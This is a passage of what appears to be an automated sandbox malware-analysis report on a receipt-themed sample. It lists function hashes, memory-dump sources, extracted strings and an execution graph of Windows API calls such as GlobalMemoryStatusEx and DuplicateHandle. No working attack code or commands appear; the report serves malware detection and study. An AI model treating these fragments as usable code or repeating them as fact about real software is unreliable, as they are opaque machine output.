                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d4fa4526b7fac000246246fe3b5b217be1a102342cacc3d02b106c03c0222dbe
                • Instruction ID: e4b62ae8b40caffe410a57f84e3bbb7156719a782cec901bef1a8822c02fa3dc
                • Opcode Fuzzy Hash: d4fa4526b7fac000246246fe3b5b217be1a102342cacc3d02b106c03c0222dbe
                • Instruction Fuzzy Hash: FCD0126050F3D14FCB0BEB2C9D544843F705B5330071D44EA9041CB667D719C80EC716
                Function 06864E58 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5245ab55509aad0a2bdaddacfcf888dae88d4318bc9b22e4768e2270888d321
                • Instruction ID: ac76e763dc023037699698e5242fd040166aadd8db669dc223a2355b25694b4e
                • Opcode Fuzzy Hash: d5245ab55509aad0a2bdaddacfcf888dae88d4318bc9b22e4768e2270888d321
                • Instruction Fuzzy Hash: F5C0807105D3498FC3457F30E4149003F3AEF512047125A65E19D86077DE1E988DD741
                Function 06864D70 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b50346bdef95c5bf0696f283a300de70146e6185f8a123696a5bb153e45bca3
                • Instruction ID: 9d7a7c97c7b75aeacc9d82e2a140c84701b5714a755f51294ab36fba3048325e
                • Opcode Fuzzy Hash: 5b50346bdef95c5bf0696f283a300de70146e6185f8a123696a5bb153e45bca3
                • Instruction Fuzzy Hash: A1C08C1004B3E03EDB0603B00C148F23FAACFCB20070A09C3E0C4C90A2C624090A8262
                Function 0688C0D8 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 08e4584817b158d0b762d3faa7b3f637cbdb25f392b5d44afbd060468e43df28
                • Instruction ID: 7984b66c1928db87b271a159c198147690a255ffd499da19ec26fdffa80d7484
                • Opcode Fuzzy Hash: 08e4584817b158d0b762d3faa7b3f637cbdb25f392b5d44afbd060468e43df28
                • Instruction Fuzzy Hash: 4BD0926240E7C25BCB624B3098266147FA09B52225B2A0ACEC4D68E0E7D26C498AD722
                Function 06864E31 Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17382555b1e94993543d4440cb26c369bab74a8af0a7222622329afb677ca849
                • Instruction ID: d4f8d6b2ae23b2137f587777b88a816fd089ad0733abc0539cf784cdf720e20c
                • Opcode Fuzzy Hash: 17382555b1e94993543d4440cb26c369bab74a8af0a7222622329afb677ca849
                • Instruction Fuzzy Hash: 29D0125141F3C18FCB039F3889504403F71BB9722472A06DA80E0970F3D716D84DD711
                Function 06867F60 Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 13ab3a70781292beec891f3c2e390df9ebb4eef9fae1a2b02dce4a757332601e
                • Instruction ID: c557c601dbedcd8deae4c054a3b19480b33e11cfef70c7df4775d01f93d5819a
                • Opcode Fuzzy Hash: 13ab3a70781292beec891f3c2e390df9ebb4eef9fae1a2b02dce4a757332601e
                • Instruction Fuzzy Hash: DED0CA30158A02DFC3409F64D044A80BBB4AB09628B2281AAE1588B622D22AA8928B80
                Function 06C7EFF3 Relevance: .0, Instructions: 10COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 71dc9fbc653319419f8265f62589740b562880aefb7673733583e23d56e1fa02
                • Instruction ID: 72b419022cf749f06a4dd22f9373ee5dead6109e0cb61927ae2a1f7147010c97
                • Opcode Fuzzy Hash: 71dc9fbc653319419f8265f62589740b562880aefb7673733583e23d56e1fa02
                • Instruction Fuzzy Hash: E3C08C2450A3894FDF0B3B205C261193E2D9B82320F0043D2DA719F1E2CD086A098326
                Function 08501428 Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8c20ea94a305f28b7a86ee46226e3ecd3349caa9bd7510e667665bb8a9d188b4
                • Instruction ID: b60813639a8b3854b87244df12745469f59f3ab909e2747309196c9f40abbf06
                • Opcode Fuzzy Hash: 8c20ea94a305f28b7a86ee46226e3ecd3349caa9bd7510e667665bb8a9d188b4
                • Instruction Fuzzy Hash: A1C08CB83002004FD3088B348C88A2B7AE7EFD8302F81C42DA2058A22CCA78C840DA74
                Function 08500EC8 Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ea61a442b2df7b2a0752b7fcc3dad22c3463a801c975dc0f260fcfa5da37fb41
                • Instruction ID: a241dee4dd3f12587bb924b756f877616c491eba5bdfafe7df049e9ab1784310
                • Opcode Fuzzy Hash: ea61a442b2df7b2a0752b7fcc3dad22c3463a801c975dc0f260fcfa5da37fb41
                • Instruction Fuzzy Hash: EEC080602093835FDB01D3A4C4645157F119B4135871514A6C0506B6A3C614DC0AC783
                Function 06C7A5F0 Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                Function 085006E8 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99e07f6a8d42fb9823a126a7903a56565eedb8740b064ee688a7a4625ec5cb41
                • Instruction ID: 1dce13ebf47746d29ed44119d4fbf49dd36079a074be943c022ccf2cb70b4d73
                • Opcode Fuzzy Hash: 99e07f6a8d42fb9823a126a7903a56565eedb8740b064ee688a7a4625ec5cb41
                • Instruction Fuzzy Hash: 64B0123008030D8FC6047B54FC05E18375CE940304B5055A0B40C1702D5B7C6C89CAC5
                Function 08500F00 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ce29ed20aec74787ff96c2214fd4131f4b4dec562d80b508ce114ea3e39c1813
                • Instruction ID: c32b24d9cb25ad8d786be96a966ffa2118c03798c06b0861fd390535d6a641a9
                • Opcode Fuzzy Hash: ce29ed20aec74787ff96c2214fd4131f4b4dec562d80b508ce114ea3e39c1813
                • Instruction Fuzzy Hash: E2B0123104030E8FC5007F54F504D15375CEA40204B4095A8A11C0522F5E68A81DCAC4
                Function 06864E68 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b50f21b66feed13ed0c7148f2b05b208895f263b945e12ef9c7869510381bd16
                • Instruction ID: fd3a63c2c4c523f776a5c2f4f410c70e671b1e13a2868a7dd049f89ed57d81a1
                • Opcode Fuzzy Hash: b50f21b66feed13ed0c7148f2b05b208895f263b945e12ef9c7869510381bd16
                • Instruction Fuzzy Hash: 4EB0123105120D4FC5407B54F804D14372DE9442487402520A20C0503AEB68784E8684
                Function 0686AF20 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: de847a0528bbc7a7393f5e98ae606a4b181b211cc876a90962d2b0a83971d2f4
                • Instruction ID: 03308a7015262dc60266e0276a8c8d94ddd012c5f0dd28833018c3f95f56e0d9
                • Opcode Fuzzy Hash: de847a0528bbc7a7393f5e98ae606a4b181b211cc876a90962d2b0a83971d2f4
                • Instruction Fuzzy Hash: 7EB092341602088F82009B59D448C0077ECAF08A0434140D0E1088B632C621F8008A40
                Function 06867F70 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                Function 0686BB20 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                Function 06867880 Relevance: .0, Instructions: 7COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

                Non-executed Functions

                Function 06866B60 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: %
                • API String ID: 0-2567322570
                • Opcode ID: 69ae5f8d1367e12c37ce7e5ea4b08c4186aa5f07d32b08d856aa3feeac72b126
                • Instruction ID: 334c35bf001d6fab232e57ea5c48f4c8e2d55a95a9946be40b4b8d600d8fe070
                • Opcode Fuzzy Hash: 69ae5f8d1367e12c37ce7e5ea4b08c4186aa5f07d32b08d856aa3feeac72b126
                • Instruction Fuzzy Hash: 2C028170A002088FDB54EFA9C854AAEBBB6FF88304F10846DE515EB355DB35E946CB91
                Function 06881578 Relevance: 1.3, Instructions: 1271COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a051eef82591f2e90d069a10a1eabcfb76bcbc03d3245eb4ca1cae330db45d85
                • Instruction ID: 87912c503512e59c9f082185a76831c15c95183efc5aca35b49c853b621f815b
                • Opcode Fuzzy Hash: a051eef82591f2e90d069a10a1eabcfb76bcbc03d3245eb4ca1cae330db45d85
                • Instruction Fuzzy Hash: 55C23734A00219CFDB64EF64C858BADBBB2FF89301F1085A9D94AA7355DB359D82CF50
                Function 08509069 Relevance: .8, Instructions: 781COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50f064fbb9df7df70008772fc27affd212f9ae4527749aef859f849cf563d4eb
                • Instruction ID: c0355c8d292d2536838f57451e07c3abd38b91ab594fb8b7f4b8a6b13205a134
                • Opcode Fuzzy Hash: 50f064fbb9df7df70008772fc27affd212f9ae4527749aef859f849cf563d4eb
                • Instruction Fuzzy Hash: 22622DB06002009FD748DF19D55875A7ADAFF84308F64C96CD109DF396CBBAEA0B8B95
                Function 08509078 Relevance: .8, Instructions: 780COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e89bb28656d9c522e808514970e2523cd9c13d6db04c7834bea2e84f57173f8e
                • Instruction ID: 6e41e0b735ea24851d452af4c96ea379bec2ca0af582ce819dacd631309da933
                • Opcode Fuzzy Hash: e89bb28656d9c522e808514970e2523cd9c13d6db04c7834bea2e84f57173f8e
                • Instruction Fuzzy Hash: 62622EB06002009FD748DF19D55875A7ADAFF84308F64C96CD109DF396CBBAEA0B8B95
                Function 06C71AD8 Relevance: .5, Instructions: 474COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c2388c2cef52cb1055d1d17e1bb8b5f680e78d42da98096ffbc8e5e2051f5ba
                • Instruction ID: 1562682d7d650b6532af7c2605d2e17d19cb00631b523d75d4b64cfb5537b4e5
                • Opcode Fuzzy Hash: 2c2388c2cef52cb1055d1d17e1bb8b5f680e78d42da98096ffbc8e5e2051f5ba
                • Instruction Fuzzy Hash: CB225B70A00218CFDB55DF69C844BADBBB2BF89305F1484A9E809AB361DB35DE85CF51
                Function 06C78410 Relevance: .4, Instructions: 443COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cd42db812ef952fa6cf6c24febc5c63c74612ded803e0c9cce64cb2026dcd265
                • Instruction ID: 461002fa3dcb3fac93951f0c5dfdde07181e12890287c972c89615144e52d3fc
                • Opcode Fuzzy Hash: cd42db812ef952fa6cf6c24febc5c63c74612ded803e0c9cce64cb2026dcd265
                • Instruction Fuzzy Hash: 6A021774A006059FCB54DF69C588AAEBBF6FF88310F158469EA05EB361DB34ED41CB60
                Function 06D1A013 Relevance: .3, Instructions: 314COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15eff07db322d62072b11219ffbe68ad811545bda0793d3ae2535666f6613911
                • Instruction ID: 71bd671cafebae2fd2627efa8d0b3d6e95aab0f85cf8320b79f0472fddc52deb
                • Opcode Fuzzy Hash: 15eff07db322d62072b11219ffbe68ad811545bda0793d3ae2535666f6613911
                • Instruction Fuzzy Hash: F0E13774E012199FCB14DFA9D580AAEFBF2FF89305F248169D414AB316D771A942CFA0
                Function 06D1A450 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dfb538dab7e7dd766938ff589c039d67a059808fab6ccee7699ff83888bc668c
                • Instruction ID: e898ea820e090d634efbe2b87220cbcad6dc19d576aa34d920f3fffffa696b7e
                • Opcode Fuzzy Hash: dfb538dab7e7dd766938ff589c039d67a059808fab6ccee7699ff83888bc668c
                • Instruction Fuzzy Hash: E4E13774E015198FDB14DFA9C5809AEFBF2FF88304F248169D414AB31AD770A942CFA0
                Function 06D1C518 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: caad5e19f4f0319ac28873354d1dda72f86fe7752c43d26e26d5e6760b09b2b7
                • Instruction ID: 52e07057b3ef84702cf6dfc69eced2066e4259142ddea9df7de079c584fab4c7
                • Opcode Fuzzy Hash: caad5e19f4f0319ac28873354d1dda72f86fe7752c43d26e26d5e6760b09b2b7
                • Instruction Fuzzy Hash: 85E13574E102199FCB14DFA9D580AAEFBF2FF88305F248169D414AB316C774A942CFA0
                Function 06D1C0E0 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 925ba751260dbc4fa0588c1d4061704bde09356549418f7765d19ff7d8dca4d4
                • Instruction ID: e708e72bf3e3953fb33cc69534148079b99efaf7cb18afb7995b791e5aa29bf2
                • Opcode Fuzzy Hash: 925ba751260dbc4fa0588c1d4061704bde09356549418f7765d19ff7d8dca4d4
                • Instruction Fuzzy Hash: 42E12874E102199FCB14DFA9D5809AEFBF2FF89305F248169D814AB316C734A942CFA1
                Function 06D1A888 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bd194d4633a57707a7f1a22295f95e38de33059443a0b34faa30f247e3385eb
                • Instruction ID: 32b3b0b86b1a1c7820c177c741f36016c69fc067df7849792b9f5a2c75f29a3b
                • Opcode Fuzzy Hash: 2bd194d4633a57707a7f1a22295f95e38de33059443a0b34faa30f247e3385eb
                • Instruction Fuzzy Hash: D7E11874E012199FCB14DFA9D6809AEFBF2FF89305F248169D414AB356D770A942CFA0
                Function 06C75E48 Relevance: .3, Instructions: 310COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1a46be4bdf231a82ca513cef6120bc4a5639dc47cffa8182b258ef633295a3e
                • Instruction ID: 0dc20ff7c53401eff1629ee63a6fc1e435d623d43b4d0d5e676ce7520b92811a
                • Opcode Fuzzy Hash: d1a46be4bdf231a82ca513cef6120bc4a5639dc47cffa8182b258ef633295a3e
                • Instruction Fuzzy Hash: DFC19E70A006018FD748EB69C598A6EBBF6FF88300F048469D406E73A2DF78ED45CB91
                Function 00B6E22C Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e36e9c715b9209a8b5ccde43c164e9260e00b051bbf9a0d6b39d2fda414e852a
                • Instruction ID: c1e7f9accdf954c1e8b6801c25a9e441062a6999cfaee78c9f091286c88698a4
                • Opcode Fuzzy Hash: e36e9c715b9209a8b5ccde43c164e9260e00b051bbf9a0d6b39d2fda414e852a
                • Instruction Fuzzy Hash: AFA16C36E0021A8FCF09DFA5D8445AEB7F6FF84300B1545BAE815AB265DB39D916CB40
                Function 06D1C508 Relevance: .1, Instructions: 133COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 74f78ba452b334a7566000c83a0838611859567f13e3524406388c71510b5b46
                • Instruction ID: f4d1ea5ea6f5506461be8ba3fc0e8d0d21521daaf99b546b95631d90c7a42eb3
                • Opcode Fuzzy Hash: 74f78ba452b334a7566000c83a0838611859567f13e3524406388c71510b5b46
                • Instruction Fuzzy Hash: D4512A70E142198FDB14CFA9D5809AEFBF2BF89305F24C169D418AB316D7749A42CFA1
                Function 06D1C0D3 Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b7add6a3cb0ba5ccf3cd69b63c7922b2cbc8e8ff2d1bf4273d6c6adbb952eb0
                • Instruction ID: 4b9db2172c31363b034466db61f81d3816c3123c09d2f96fe2b6ec6b167031b6
                • Opcode Fuzzy Hash: 6b7add6a3cb0ba5ccf3cd69b63c7922b2cbc8e8ff2d1bf4273d6c6adbb952eb0
                • Instruction Fuzzy Hash: 9A513B70E152198FCB14CFA9C5809AEFBF2BF89304F24C169D418AB316D7309942CF61
                Function 06888C68 Relevance: 6.5, Strings: 5, Instructions: 231COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $eq$4c]q$4c]q$heq$heq
                • API String ID: 0-4251209141
                • Opcode ID: 675e4def82788723eda9fc8c53347402a529cef05477fac58300945f5e041401
                • Instruction ID: caeb86a6291ed756ac837fb29d120a3736c49a1e0bec388301e9c2662b03583b
                • Opcode Fuzzy Hash: 675e4def82788723eda9fc8c53347402a529cef05477fac58300945f5e041401
                • Instruction Fuzzy Hash: 05A15874A006058FDB54DF28C584A6ABBF6FF88310F5984A9E509DB3B2DB71EC84CB51
                Function 06C79598 Relevance: 6.5, Strings: 5, Instructions: 204COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: ?$B$B$C$C
                • API String ID: 0-1150723364
                • Opcode ID: b632aae87b6eaacaf2ab64454af8527339219141c8bb7b2c2765f1b2c2ba649c
                • Instruction ID: 128c9d055a911a66ca8f5892f19c072b67c7c3bf4b15cf5f2a02cc97ed244078
                • Opcode Fuzzy Hash: b632aae87b6eaacaf2ab64454af8527339219141c8bb7b2c2765f1b2c2ba649c
                • Instruction Fuzzy Hash: A981C371E002048FCB98DFA9D9819ADBBF2FF89300F14856ED416AF351DB31AA05CB91

                Execution Graph

                Execution Coverage:11.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:224
                Total number of Limit Nodes:21
                execution_graph 33191 163b5f0 DuplicateHandle 33192 163b686 33191->33192 33367 5632750 33368 5632792 33367->33368 33369 5632798 GetModuleHandleW 33367->33369 33368->33369 33370 56327c5 33369->33370 33371 163afa0 33372 163afe6 GetCurrentProcess 33371->33372 33374 163b031 33372->33374 33375 163b038 GetCurrentThread 33372->33375 33374->33375 33376 163b075 GetCurrentProcess 33375->33376 33377 163b06e 33375->33377 33378 163b0ab 33376->33378 33377->33376 33379 163b0d3 GetCurrentThreadId 33378->33379 33380 163b104 33379->33380 33381 6437480 33382 64374a5 33381->33382 33386 6437717 33382->33386 33392 6437728 33382->33392 33383 6437507 33387 64376b9 33386->33387 33388 64376bd 33387->33388 33397 6437751 33387->33397 33402 6437760 33387->33402 33388->33383 33389 6437736 33389->33383 33393 6437729 33392->33393 33395 6437751 GlobalMemoryStatusEx 33393->33395 33396 6437760 GlobalMemoryStatusEx 33393->33396 33394 6437736 33394->33383 33395->33394 33396->33394 33398 6437795 33397->33398 33399 643776d 33397->33399 33407 64368a0 33398->33407 33399->33389 33403 6437795 33402->33403 33404 643776d 33402->33404 33405 64368a0 GlobalMemoryStatusEx 33403->33405 33404->33389 33406 64377b2 33405->33406 33406->33389 33408 6437838 GlobalMemoryStatusEx 